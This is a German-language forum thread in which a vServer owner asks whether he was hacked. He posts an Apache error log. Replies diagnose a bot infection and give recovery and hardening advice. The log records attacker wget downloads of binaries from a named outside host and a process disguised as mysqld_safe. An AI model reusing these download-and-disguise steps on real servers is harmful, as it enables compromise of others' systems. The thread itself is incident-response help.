Ich wurde gahackt! - Richtig?

[Nordin]

Hallo,

so wie ich das sehe, wurde ich gehackt richtig?
Was hat der angreifer gemacht??
Kann ich das irgendwie beheben?

(Ich hab einen vServer bei 1blu)

aus error_log

--20:10:29--  [URL]http://konoa.altervista.org/httpd[/URL]
           => `httpd'
Resolving konoa.altervista.org... 75.126.23.99
Connecting to konoa.altervista.org|75.126.23.99|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219,325 (214K) [text/plain]

    0K .......... .......... .......... .......... .......... 23%   90.51 KB/s
   50K .......... .......... .......... .......... .......... 46%  279.31 KB/s
  100K .......... .......... .......... .......... .......... 70%  213.14 KB/s
  150K .......... .......... .......... .......... .......... 93%  360.50 KB/s
  200K .......... ....                                       100%   12.12 MB/s

20:10:31 (193.68 KB/s) - `httpd' saved [219325/219325]

--20:10:31--  [URL]http://konoa.altervista.org/xh[/URL]
           => `xh'
Resolving konoa.altervista.org... 75.126.23.99
Connecting to konoa.altervista.org|75.126.23.99|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,125 (15K) [text/plain]

    0K .......... ....                                       100%   53.58 KB/s

20:10:31 (53.58 KB/s) - `xh' saved [15125/15125]

--20:10:31--  [URL]http://konoa.altervista.org/legend[/URL]
           => `legend'
Resolving konoa.altervista.org... 75.126.23.99
Connecting to konoa.altervista.org|75.126.23.99|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,508 (1.5K) [text/plain]

    0K .                                                     100%   84.60 MB/s

20:10:32 (84.60 MB/s) - `legend' saved [1508/1508]

--20:13:36--  [URL]http://konoa.altervista.org/httpd[/URL]
           => `httpd'
Resolving konoa.altervista.org... 75.126.23.99
Connecting to konoa.altervista.org|75.126.23.99|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219,325 (214K) [text/plain]

    0K .......... .......... .......... .......... .......... 23%   90.41 KB/s
   50K .......... .......... .......... .......... .......... 46%  281.38 KB/s
  100K .......... .......... .......... .......... .......... 70%  361.73 KB/s
  150K .......... .......... .......... .......... .......... 93%  361.34 KB/s
  200K .......... ....                                       100%  144.92 KB/s

20:13:38 (193.79 KB/s) - `httpd' saved [219325/219325]

--20:13:38--  [URL]http://konoa.altervista.org/xh[/URL]
           => `xh'
Resolving konoa.altervista.org... 75.126.23.99
Connecting to konoa.altervista.org|75.126.23.99|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,125 (15K) [text/plain]

    0K .......... ....                                       100%   53.56 KB/s

20:13:38 (53.56 KB/s) - `xh' saved [15125/15125]

--20:13:38--  [URL]http://konoa.altervista.org/legend[/URL]
           => `legend'
Resolving konoa.altervista.org... 75.126.23.99
Connecting to konoa.altervista.org|75.126.23.99|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,508 (1.5K) [text/plain]

    0K .                                                     100%   79.90 MB/s

20:13:39 (79.90 MB/s) - `legend' saved [1508/1508]

==> Fakename: /usr/bin/mysqld_safe PidNum: 26420
sh: /id: No such file or directory
sh: /id: No such file or directory

MfG Nordin

 

[elias5000]

Die geladenen Files sind u.a. ELF-Binaries und zwar ziemlich große.
Die können alles beinhaltet haben - das Config-File gibt Hinweise auf einen Warez-Server.
Aber bei der Größe des Binaries macht der Bot definitiv noch mehr.

Das einzige, was du jetzt tun kannst: Logs/Daten sichern (mit Hilfe des Rescue-Systems) und dann neu aufsetzen.

Ggf. Anzeige gegen Unbekannt - das könnte später deine Position verbessern, falls du als Unheber von DoS-Attacken oder sonstigem beschuldigt wirst.
Dazu solltest du alle Logs, die es auf dem Server zu finden gibt als Beweismittel einreichen. Auch die nachgeladenen Dateien, wenn sie noch existieren.

 

[Nordin]

ou wacke... also muss ich jetzt am besten zum polizeirevier und anzeige gegen unbekannt machen und sagen das mein server gehackt wurde?

die logs hab ich gesichert...

das dumme mit neu aufsetzen ist, das ich knapp 20 domains laufen hab

 

[Firewire2002]

Tja selbst schuld.
Server richtig absichern, dann kann sowas in den meisten Fällen verhindert werden.

Wichtig ist, dass du vor dem Neuaufsetzen die Schwachstelle im System findest.
Sonst nützt das Neuaufsetzen nichts, wenn der nette Mensch 2 Tage später wieder drin ist.

 

[Nordin]

Wichtig ist, dass du vor dem Neuaufsetzen die Schwachstelle im System findest.

Da ist ja das Problem... ich hab keine Ahnung wo die schwachstelle sein sollte... ich hab meinem Provider gefragt... der sagt aber das er nichts rausgeben darf... werde logs noch was anderes...

Wir dürfen diese jedoch aus Datenschutzgründen nur an Ermittlungsbehörden herausgeben, und dies auch nur auf richterlichen Beschluss. Sollten Sie rechtliche Schritte in Betracht ziehen, wenden Sie sich bitte an die nächstgelegene Polizeidienststelle.

Anzeige hab ich grad gemacht... nu werd ich erstaml von meinm komplatten server nen backup machen... ihn dann neu aufsetzen. Aber wie ich die lücken finde weiß ich ehrlich gesagt überhaupt nicht...

 

[charli]

Hallo,

da das Downloadprotokoll im Apache-Errorlog steht ist der Download (zumindest mit großer Wahrsheinlichkeit) über ein von Apache ausgeführtes PHP erfolgt.

Du solltest also nach unsicheren PHP-Scripts suchen und insbesondere nach Freeware-PHP-Anwendungen (phpBB, *nuke, *gallery und wie die alle heißen) welches nicht auf dem allerneuesten Stand war.

Zusätzlich mal ein Blick auf die sicherheitsrelevanten Einstellungen in der php.ini, insbesondere register_globals und allow_url_fopen.